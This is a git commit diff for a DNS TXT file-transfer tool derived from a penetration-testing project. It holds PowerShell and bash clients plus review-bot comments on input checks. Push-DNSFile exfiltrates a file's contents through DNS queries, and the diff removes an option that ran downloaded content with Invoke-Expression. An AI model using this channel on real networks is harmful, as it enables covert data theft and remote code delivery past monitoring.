
Minimal working examples added, README and LICENSE adjusted

master
Simon Moser vor 3 Jahren
Ursprung 7fbb57fdde
Commit 81c6d8bc21
Es konnte kein GPG-Schlüssel zu dieser Signatur gefunden werden
GPG-Schlüssel-ID: 83765B895FF2CFC6

@ -1,6 +1,6 @@
MIT License MIT License
Copyright (c) 2016 Pen Test Partners Copyright (c) 2022 Simon Moser
Permission is hereby granted, free of charge, to any person obtaining a copy Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal of this software and associated documentation files (the "Software"), to deal

@ -1,16 +1,17 @@
# Uninvited-Guest # DNS File-Transfer
Uninvited Guest - A file server for files over DNS TXT records A file server for files over DNS TXT records
## Requirements on server
- *Python3*
- *dnslib:* e.g. `pip3 install dnslib`
## Usage
First set up your domain to point to which ever server you're hosting this on. First set up your domain to point to which ever server you're hosting this on.
Then run the python server Then run the python server:
./server --domain domainname.com --directory /dir/of/tools `./server.py --domain domainname.com --directory /dir/of/tools`
It will only support a flat directory structure in /dir/of/tools It will only support a flat directory structure in /dir/of/tools
You will need to write your own client to receive files. The count of items will be in file.count.domainname.com and the strings will be in file.number.domainname.com. Strongly based on [Uninvited Guest by Pen Test Partners](https://github.com/pentestpartners/Uninvited-Guest)
An example bash client would be something like:
f="pwned.png";d="6-9.eu";c=$(dig +short txt $f.count.$d|tr -d \");for i in $(seq 0 $c);do echo -n $(dig +short txt $f.$i.$d|tr -d \");done | base64 -d > /tmp/pwned.png

@ -1,10 +1,8 @@
# Simple Powershell client, also runs on linux with Powershell Core # Simple Powershell client, also runs on linux with Powershell Core
Function Get-DnsTxt { Function Get-DnsTxt {
[CmdletBinding()] param( [CmdletBinding()] param([string] $Domain)
[string] $Domain
)
Try { Try {
return (Resolve-DnsName -Type TXT $Domain | Select-Object Strings | Format-Table -HideTableHeaders | Out-String -Width 1000).Replace("{", "").Replace("}", "").Trim() return (Resolve-DnsName -Type TXT $Domain).Strings
} Catch [System.Management.Automation.CommandNotFoundException] { } Catch [System.Management.Automation.CommandNotFoundException] {
return dig +short $Domain TXT return dig +short $Domain TXT
} }
@ -13,27 +11,14 @@ Function Get-DnsTxt {
Function Get-DnsFile { Function Get-DnsFile {
[CmdletBinding()] param( [CmdletBinding()] param(
[string] $FileName = $(Read-Host -Prompt 'Enter a FileName'), [string] $FileName = $(Read-Host -Prompt 'Enter a FileName'),
[string] $DnsName = $(Read-Host -Prompt 'Enter a DnsName'), [string] $DnsName = $(Read-Host -Prompt 'Enter a DnsName')
[switch] $Execute,
[switch] $Write,
[string] $OutPath
) )
$count = [int](Get-DnsTxt -Domain "$FileName.count.$DnsName") $count = [int](Get-DnsTxt -Domain "$FileName.count.$DnsName")
$file_base64 = "" $file_base64 = ""
For ($i=0; $i -le $count; $i++) { For ($i=0; $i -le $count; $i++) {
$file_base64 += (Get-DnsTxt -Domain "$FileName.$i.$DnsName") $file_base64 += (Get-DnsTxt -Domain "$FileName.$i.$DnsName")
} }
"Base64 $file_base64" [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($file_base64))
$file_string = [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($file_base64))
"String $file_string"
If ($Execute.IsPresent) {
$file_string | Invoke-Expression
} Else {
$file_string | Out-String
}
If ($Write.IsPresent) {
$file_string | Out-File -FilePath ($OutPath, $FileName)[!$OutPath]
}
} }
Function Push-DNSFile { Function Push-DNSFile {
@ -41,22 +26,30 @@ Function Push-DNSFile {
[string] $FileName = $(Read-Host -Prompt 'Enter a Filename'), [string] $FileName = $(Read-Host -Prompt 'Enter a Filename'),
[string] $DnsName = $(Read-Host -Prompt 'Enter a DnsName') [string] $DnsName = $(Read-Host -Prompt 'Enter a DnsName')
) )
$id = (Get-FileHash $FileName | Select-Object Hash | Format-Table -HideTableHeaders | Out-String).Trim() $id = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes((Get-FileHash $FileName).Hash)).Substring(0,6)
$id = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($id)).Substring(0,6) $content = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes((Get-Content -Path $FileName)))
$content_binary = Get-Content -Path $FileName -Encoding utf8
$content_base64 = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($content_binary))
$i = 0 $i = 0
While ($content_base64) { While ($true) {
$url = "."+$i+"-"+$id+"u."+$DnsName $url = ".$i-${id}u.$DnsName"
$len = 63 - $url.Length $len = 63 - $url.Length
if($len -le $content_base64.Length) { $i++
$content_part = $content_base64.Substring(0, $len) if($len -lt $content.Length) {
$content_base64 = $content_base64.Substring($len) Get-DnsTxt -Domain ($content.Substring(0, $len) + $url)
$content = $content.Substring($len)
} else { } else {
$content_part = $content_base64 Get-DnsTxt -Domain ($content + $url)
$content_base64 = $false break
} }
Get-DnsTxt -Domain ($content_part + $url)
$i++
} }
} }
# Minimal working example for download in case you have to type it all manually
Function MWE {
param([string] $f, [string] $d)
$c = [int]((Resolve-DnsName -Type TXT "$f.count.$d").Strings)
$o = ""
For ($i=0; $i -le $c; $i++) {
$o += (Resolve-DnsName -Type TXT "$f.$i.$d").Strings
}
[Text.Encoding]::Utf8.GetString([Convert]::FromBase64String($o))
}
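Review bot: The `dig` fallback in Get-DnsTxt (`return dig +short $Domain TXT`) still returns TXT data wrapped in double quotes, while the new `Resolve-DnsName` branch returns bare `.Strings`. On a host without `Resolve-DnsName`, the `[int](Get-DnsTxt ...)` cast in Get-DnsFile would presumably throw, and the concatenated base64 would contain quote characters. Stripping them in the fallback, e.g. `return (dig +short $Domain TXT) -replace '"', ''`, keeps both branches consistent with the bash client's `tr -d \"`. Separately, `$count` comes straight from an unauthenticated DNS answer and is used as the loop bound with no range check; rejecting anything that is not a non-negative integer below a sane limit before the `For` loop would avoid an unbounded run of lookups. Get-DnsTxt's closing brace lies outside the first hunk.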

@ -20,3 +20,9 @@ else
fi fi
done done
fi fi
# Minimal working example for download in case you have to type it all manually
mwe() {
f=$1; s=$2; c=$(dig +short txt "$f".count."$s"|tr -d \")
for i in $(seq 0 "$c"); do echo -n "$(dig +short txt "$f"."$i"."$s"|tr -d \")"; done | base64 -d > "$f"
}
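Review bot: `mwe` uses the count returned by `dig` unchecked: if the lookup fails or returns something non-numeric, `seq 0 "$c"` errors out, but the `> "$f"` redirection has already truncated any existing file of that name. A guard before the loop such as `case $c in ''|*[!0-9]*) echo "bad count: $c" >&2; return 1;; esac` avoids that. If the script runs under bash, `local f=$1 s=$2 c i` would also keep the one-letter variables out of the caller's shell. The data arrives over unauthenticated DNS, so the written file should be compared against a known hash before it is used.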

@ -1,4 +1,4 @@
#!/usr/bin/env /usr/bin/python #!/usr/bin/env /usr/bin/python3
# -*- coding: utf-8 -*- # -*- coding: utf-8 -*-
""" """
